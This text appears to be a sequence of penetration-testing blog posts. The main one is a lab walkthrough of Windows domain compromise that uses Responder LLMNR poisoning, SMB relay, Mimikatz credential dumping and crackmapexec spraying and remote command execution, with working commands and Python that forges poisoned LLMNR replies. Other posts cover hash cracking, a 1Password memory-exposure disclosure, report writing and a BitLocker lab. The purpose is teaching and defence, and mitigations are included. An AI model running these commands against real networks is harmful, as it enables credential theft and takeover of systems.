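CORP\\jdoe_history0:1105:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:3f1a0b6c1d3b5e7f9a1c2d4e6f8a0b1c:::
[*] Cleaning up...
"""

if __name__ == "__main__":
    # Real use: audit(parse_secretsdump(open("ntds.txt").read()))
    for name, items in audit(parse_secretsdump(SAMPLE)).items():
        print(f"{name}: {items}")
```

Shared NT hashes are worth reporting even when the password never cracks: if Administrator and a service account share one, cracking or pass-the-hash on either compromises both.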

John The Ripper

You can crack the hashes using wordlists:

john --wordlist=/PATH/TO/WORDLIST --pot=FILENAME.pot /PATH/TO/HASHFILE

You may have to include the format using --format (for the NT hashes from secretsdump, --format=NT).

Wordlists

Here are some good places to get wordlists:

https://hashes.org (LinkedIn Breach, HIBP, etc).

https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

https://github.com/danielmiessler/SecLists/tree/master/Passwords

Responder -> MultiRelay -> Mimikatz -> Crackmapexec ->Windows PWNage

For this post, we’re going to do a scenario-based usage of the following tools: responder, MultiRelay.py, mimikatz, and crackmapexec.

This post gained influence from “Skip Cracking Responder Hashes and Replay Them” by Dank Panda (Richard De La Cruz of Tevora).

The Scenario:

We are on the internal network of a Windows domain.
Users are Local Administrators on local workstations.
Domain Administrators have separate admin accounts from their normal accounts, but login with their Domain Administrator account on the same workstation.
We have already scanned the network with NMap and have found the live hosts.
SMB Signing is disabled on workstations
WDigest is on.
LLMNR is enabled.

The Environment:

OS: Windows Server 2008
IP: 10.0.2.15
Services: Active Directory Directory Services, DNS
Logged On Users: kcharles (domain administrator)

OS: Windows 7
IP: 10.0.2.4
Services: Local workstation
Logged On Users: sleaf (domain user/local administrator), sleafadmin (domain administrator)

OS: Windows 7
IP: 10.0.2.5
Services: Local Workstation
Logged On users: jegghead (domain user/local administrator)

OS: Kali Linux
IP: 10.0.2.6
Services: This is our attack machine.
Logged On Users: me 😉

Setting up our attack machine:

Do the usual (eg, apt-get update, apt-get upgrade)
Install crackmapexec: apt-get install crackmapexec

Let’s do this!

First, let’s set up Responder. We’ll have to edit the Responder settings to turn off its HTTP and SMB servers, so that the poisoned connections go to MultiRelay instead of being answered by Responder itself. In Kali Linux, the config can be found at /usr/share/responder and is named Responder.conf.

We can go ahead and turn responder on. We’ll be using the flags: -I and -rv.

You can see what interface you’re using by using ifconfig:

Alright, now let’s startup responder.

responder -I eth0 -rv

If we wanted to check for machines on the subnet with SMB signing not enabled, we can use RunFinger.py which is in the responder toolset. On Kali Linux, you can find it at:

/usr/share/responder/tools named RunFinger.py

And all you’d do is:

python RunFinger.py -i 10.0.2.0/24

Now, let’s setup MultiRelay.py. This is a tool in the responder toolset. You can find it in Kali Linux at:

/usr/share/responder/tools named MultiRelay.py

We’ll start MultiRelay by pointing it at a target (-t) and using all users (-u ALL).

python MultiRelay.py -t 10.0.2.4 -u ALL

Remember that sleaf and sleafadmin are logged into this Windows 7 machine.

Now, anyone who has used Responder knows that it can take a bit to get any good traffic. We’d be waiting for someone to try to access something we can poison, so for the purpose of this demo, we’re going to have jegghead navigate to a share that doesn’t exist.

You’ll see that responder picks up on this LLMNR and poisons the request.

Now, we’ll see in our MultiRelay.py output that the poisoned LLMNR answer sent jegghead’s SMB authentication to us, and we relayed it to 10.0.2.4, where she is a local administrator. We now have LocalSystem privileges on 10.0.2.4.

From here, we can run commands built-in to this Responder interactive shell. For this demo, we are going to run Mimikatz.

We can do this within the shell by doing: mimi sekurlsa::logonpasswords

Here we get sleaf’s password:

And because sleaf used their admin account on the same machine, we get sleafadmin:

Woot woot. Now, we have the credentials of a domain administrator!

So, now we’ve used responder, multirelay, and mimikatz.

So why don’t we just use these credentials to remote desktop? We could, if it is available, and there are many other options (PowerShell remoting, wmic, and more). For now we’ll use crackmapexec, since it runs in memory and uses built-in Windows mechanisms that aren’t often audited or monitored.

This next tool is called crackmapexec and it can be used for many uses, but we’ll focus on a few.

Let’s spray our credentials to find who’s logged in where.

We can do this by pointing crackmapexec at the subnet and passing the creds:

crackmapexec 10.0.2.0/24 -u 'sleafadmin' -p 'P@ssw0rd' --lusers

This is definitely useful if we know that the user we have compromised has local administrator on all local workstations. Let’s say sleaf was an admin that didn’t login to her admin account on her local workstation. We could use jegghead’s account to spray around the subnet looking for an admin that did.

We could also spray mimikatz trying to get credentials. To show that all you need is local administrator on the machines, we’ll use jegghead’s account. The machines that show “(Pwn3d!)” next to them mean that she’s local administrator on that machine.

crackmapexec 10.0.2.0/24 -u 'jegghead' -p '1upGirl!' -M mimikatz

The reason you’re seeing “Waiting on x host(s)” is because the network is slow, but you’ll see jegghead was local administrator on the workstations but not the server.

Now, let’s look at some of the other features.

With the -x switch, we can run commands directly on the machine we target. We’ll be targeting the server (10.0.2.15). We’ll be running a command to ping us (10.0.2.6). I’ll have wireshark up to show the icmp packets coming back to our attack machine.

crackmapexec 10.0.2.15 -u 'sleafadmin' -p 'P@ssw0rd' -x 'ping 10.0.2.6'

And here’s the wireshark capture:

So, there we are. A few examples of the usage of crackmapexec.

So in this demo, we’ve used responder, runfinger, multirelay, mimikatz, and crackmapexec.

Why Things Work

Remember our scenario.

Let’s go over some definitions and some quick additional information.

LLMNR (Link-Local Multicast Name Resolution) – This is a name-resolution protocol that reuses the DNS message format. When trying to find a host, a Windows machine checks its hosts file, then DNS, and then falls back to LLMNR (and NBT-NS). LLMNR is limited in that it is not routable: queries are multicast to 224.0.0.252 on UDP 5355, so only machines on the same subnet can answer. Responder essentially waits for a Windows machine to ask “Who’s X?” and answers “Oh, I’m X.” If successful, the victim connects to the attacker and sends a Net-NTLMv1/v2 challenge-response, which can then be cracked or relayed.

SMB (Server Message Block) – This is an application-layer network protocol, mostly used for accessing shares and printers. It runs directly over TCP on port 445, or over NetBIOS (UDP ports 137 and 138, TCP port 139). It can also run over legacy transports, but we won’t cover that.

NetBIOS – This allows apps and computers on a LAN to communicate with network hardware and send data across the network.

NTLM (NT LAN Manager) – This is a challenge-response authentication protocol. NTLMv2 is the current version of the response and is what Responder captures.

WDigest – This is a protocol for sending cleartext credentials to HTTP and Simple Authentication and Security Layer (SASL) applications. While it is enabled, LSASS keeps the logged-on user’s plaintext password in memory, which is what Mimikatz reads out.

Crackmapexec – This is a post-exploitation tool that allows for connecting and authenticating to multiple hosts at the same time. Everything either runs in memory, uses Windows API calls, or uses built-in Windows features.

Mimikatz – This is a post-exploitation tool that’s known for extracting plaintext passwords, hashes, and Kerberos tickets from memory. “Mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.”

Responder – “A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.”
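To show what “Who’s X? / I’m X” looks like on the wire, here is an added example of mine (not Responder’s code): it builds the LLMNR query a Windows host multicasts to 224.0.0.252:5355 for a name DNS could not resolve, builds the unicast answer a poisoner sends back pointing that name at its own address, and parses both. LLMNR reuses the DNS message format, so the parser is a minimal DNS-wire parser with support for the name-compression pointer the answer uses. The name, transaction ID and the attacker address (10.0.2.6 from the lab above) are constructed.

```python
from __future__ import annotations

import ipaddress
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS label encoding: length-prefixed labels, terminated by a zero byte."""
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.strip(".").split(".")) + b"\x00"


def decode_name(pkt: bytes, off: int) -> tuple[str, int]:
    """Read a DNS-style name at off, following compression pointers; returns (name, offset after the name)."""
    labels, jumped, end = [], False, off
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                      # 2-byte pointer to an earlier name
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(pkt[off:off + ln].decode("ascii"))
        off += ln
    if not jumped:
        end = off
    return ".".join(labels), end


def build_query(txid: int, name: str) -> bytes:
    """The victim's question: header (QDCOUNT=1), then the name, type A, class IN."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """The poisoner's answer: same txid, QR bit set, question echoed, one A record pointing at the attacker.
    Anyone on the link can send this; LLMNR has no way to verify who really owns the name."""
    txid = struct.unpack("!H", query[:2])[0]
    _, qend = decode_name(query, 12)
    question = query[12:qend + 4]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", QTYPE_A, QCLASS_IN, ttl, 4) + ipaddress.IPv4Address(attacker_ip).packed
    return header + question + answer


def parse(pkt: bytes) -> dict:
    """Decode header, questions and A answers of an LLMNR/DNS-format message."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    out = {"txid": txid, "is_response": bool(flags & 0x8000), "questions": [], "answers": []}
    for _ in range(qd):
        name, off = decode_name(pkt, off)
        qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
        off += 4
        out["questions"].append((name, qtype))
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            out["answers"].append((name, str(ipaddress.IPv4Address(rdata))))
    return out


def demo() -> tuple[dict, dict]:
    """Constructed exchange: a mistyped share name the DNS server could not resolve, then the poisoned reply."""
    query = build_query(0x1234, "fileshare")
    response = build_poisoned_response(query, "10.0.2.6")
    return parse(query), parse(response)


if __name__ == "__main__":
    q, r = demo()
    print("victim asks :", q["questions"])
    print("poisoner says:", r["answers"])
```

On the defensive side the same parser makes a usable detector: once LLMNR is disabled by group policy, any packet on UDP 5355 with the QR bit set is an answer nobody should be giving, and the address in it is the poisoner.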

Mitigations

Now, let’s talk how protect your organization!

  1. Make SMB signing mandatory (RequireSecuritySignature on both clients and servers). An attacker who already has administrator rights on a host can flip that registry value back off, so set up auditing of the key so at least you have that signal. Keep in mind that some printers do not support SMB signing and that it adds some network overhead.
  2. Disable WDigest (UseLogonCredential = 0) on older machines. Windows 8.1/Server 2012 R2 and later ship with it disabled by default; Windows 7/8/Server 2008 R2/2012 need KB2871997 plus the registry value. Enable auditing of the registry key.
  3. Limit who has local administrator on their machines.
  4. Limit where domain administrators can login.

Thanks. If you have any questions, use my contact form or the comments section. Let me know if you liked this post.

Password Manager Vulnerability – 1Password

Let’s give some starter information.

  1. 1Password said the vulnerability was not in scope on BugCrowd.
  2. 1Password said that some researchers have already reported this vulnerability.
  3. Bug was reported on Sunday, October 14, 2018.
  4. AgileBits responded on Wednesday, October 17, 2018. There is currently no fix or signs of them fixing the issue.
  5. Jake Miller (Laconic Wolf) reported a similar vulnerability on Dashlane (https://laconicwolf.com/2018/07/24/password-manager-vulnerability-dashlane/)

GameOfPWNZ identified a vulnerability in the 1Password Windows application. The application leaves passwords including the master password in memory even after the 1Password application has been locked.

GameOfPWNZ signed up for the 1Password Trial located here: https://1password.com/sign-up/

To exploit this vulnerability, an attacker would need to compromise the host machine that the application is on. The application must have been signed into and locked without a reboot to the host machine.

The below screenshots show GameOfPWNZ using Process Hacker to check memory for the process 1Password. The 1Password application was unlocked after system bootup (as a user would do) and used for one of the passwords. The application was then locked and was not unlocked for the rest of the testing (2-3 hours). After about 2-3 hours, GameOfPWNZ checked the memory and was able to obtain the master password as well as the password used during the earlier session.

Steps to Reproduce

  1. Login to 1Password Windows Application.
  2. Use normally
  3. Lock 1Password Windows Application.
  4. Load Process Hacker
  5. Right click 1Password.exe and go to Properties.
  6. Go to the “Memory” tab.
  7. Click on the “Strings…” button.
  8. Keep defaults and press OK.
  9. Click on Filter.
  10. Select Contains.
  11. Enter password to search for (use master password if you want to see master password).

Notes: Host compromise is required. Think about how many users are local admin. My opinion is that this is an issue because a host compromise leads to compromise on social media, banking, etc. I think that wiping the memory after locking the application would be a good remediation for this issue.

Writing A Penetration Test Report

Penetration testing can be fun. You get to PWN all the things. You get to solve puzzles. But when it is all done, it’s time to write the report for the client.

If you’ve never written a penetration test report, this post is for you. What I did was exploit some of the vulnerabilities in Metasploitable 2 and create a sample penetration test report.

The sample report: http://gameofpwnz.com/uploads/documents/Metasploitable_Report.docx

Here are some things to make sure you include:

  • Executive Summary (Keep in mind who your audience is)
  • Scope (This should have been determined during pre-engagement)
  • Methods (What is your penetration methodology or formula?)
  • Risk Rating (A risk rating is important in determining which risks need to be mitigated and which could possibly be accepted)
  • Impact (What happens if an attacker exploits the vulnerability?)
  • Remediation (Exploitation is fun, but we need to help the blue team know what the corrective actions would be to mitigate the issue)

Screenshots and steps to reproduce are great for showing the client how you were able to exploit the vulnerability. It also allows the client to check their fixes when they try to reproduce.

This report template is not the actual report template I use in penetration testing, but it’s something I’m willing to share. Feel free to use it. Also, feel free to leave comments about what else you think should be added or any other recommendations.


Dislocker USB with Bitlocker (LAB)

This lab will take you through using Dislocker to view data on a USB disk image that has Bitlocker encryption.  The password for Bitlocker will be provided.


Real life use: Hard drive with Bitlocker fails to boot.  You need to recover data from it.


Bitlocker USB DD image: https://drive.google.com/a/gameofpwnz.com/file/d/0B3KtykBk15nNamdMSVpYaXRPRlU/view?usp=sharing

MD5 Checksum: 90860ff85a78f1421e6f26f44c10b8ae

In Kali, you can use this to attach the image to a loop device and expose its partitions (the BitLocker volume then shows up as /dev/loopNpM) 🙂 :

losetup --partscan --find --show encrypted.001

The Bitlocker Password is password

Use this Procedure: https://gameofpwnz.com/dislocker-recovering-data-from-drive-with-bitlocker-requires-bitlocker-recovery-key-or-password/

The procedure can be altered slightly for this lab.  I used a Kali Linux Virtual Machine instead of a live USB to complete this lab.  In this lab, I use the password rather than the recovery key.  Notice the slight difference in the command when using each.


Lab created by @GameOfPWNZ